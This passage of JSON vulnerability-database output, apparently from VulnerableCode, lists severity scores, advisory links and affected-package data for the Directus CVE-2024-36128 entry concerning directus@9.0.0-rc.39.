N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-06-03T15:30:27Z/"}],"url":"https://github.com/directus/directus/commit/7d2a1392f43613094de700062aba168a9400dd3b"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-36128","reference_id":"CVE-2024-36128","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-36128"},{"reference_url":"https://github.com/advisories/GHSA-632p-p495-25m5","reference_id":"GHSA-632p-p495-25m5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-632p-p495-25m5"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-632p-p495-25m5","reference_id":"GHSA-632p-p495-25m5","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-06-03T15:30:27Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-632p-p495-25m5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/81614?format=json","purl":"pkg:npm/directus@10.11.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.11.2"}],"aliases":["CVE-2024-36128","GHSA-632p-p495-25m5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-yz34-qwam-wbcn"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.0.0-rc.39"}